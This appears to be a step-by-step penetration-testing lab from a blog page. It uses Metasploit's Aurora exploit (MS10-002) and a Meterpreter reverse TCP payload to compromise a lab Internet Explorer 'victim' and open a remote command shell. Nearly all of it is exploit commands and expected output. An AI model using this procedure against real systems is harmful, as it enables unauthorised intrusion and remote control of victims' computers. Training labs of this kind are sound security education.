In the following exercise, you will use Metasploit from the BackTrack distribution to deliver an exploit to a vulnerable version of Internet Explorer:
1. From a BackTrack shell, navigate to the Metasploit Framework 3 folder (only type what’s in bold):
user1@pentest:~# cd /pentest/exploits/framework3
user1@pentest:~# pwd
/pentest/exploits/framework3
2. Open the Metasploit Framework console (only type what’s in bold):
user1@pentest:~# ./msfconsole
3. You are now going to setup Metasploit to use the Aurora exploit, made famous in December, 2009, when Chinese hackers launched this malware (and a host of others) against Google and 35 other multinational companies (only type what’s in bold):
msf > use windows/browser/ms10_002_aurora
4. Set the IP address of your BackTrack system, which will run a web server hosting the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > set SRVHOST BackTrack_IP_Address
SRVHOST => BackTrack IP Address
5. Next, set the Meterpreter payload to launch a reverse shell once the victim visits the web server being hosted on your BackTrack system (only type what’s in bold, on one line):
msf exploit (ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
6. Set the following option for the Meterpreter payload (only type what’s in bold):
msf exploit (ms10_002_aurora) > set LHOST BackTrack_IP_Address
LHOST => BackTrack IP Address
7. You are now ready to launch the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > exploit
Your output should look as follows:
[*] Exploit running as background job.
[*] Started reverse handler on BackTrack_IP_Address:4444
[*] Using URL: http://BackTrack_IP_Address:8080/text_string - select and copy the URL being outputted here
[*] Server started.
msf exploit (ms10_002_aurora) >
8. Leave this shell open - you will return to it shortly
9. Log into your Victim Windows system
10. Open Internet Explorer
11. Paste the URL from step #7 into the address bar and hit ENTER
12. Switch back to your BackTrack system
You should see the following output:
[*] Sending Internet Explorer “Aurora” Memory Corruption to client Windows_Victim_IP_Address
[*] Sending stage (749056 bytes) to Windows_Victim_IP_Address
[*] Meterpreter session 1 opened (BackTrack_IP_Address:4444 -> Windows_Victim_IP_Address:Port #) at
Day, Date Time
Note: you need to hit ENTER to get your Metasploit shell back
13. Type the following (only type what’s in bold):
msf exploit (ms10_002_aurora) > sessions -i x (where x is the Channel number in the output in step #12)
[*] Starting interaction with 1…
meterpreter >
14. Open a Windows command shell through the Meterpreter shell
Command to open a Windows command shell through Meterpreter : execute -f cmd.exe -i -H
ReplyDelete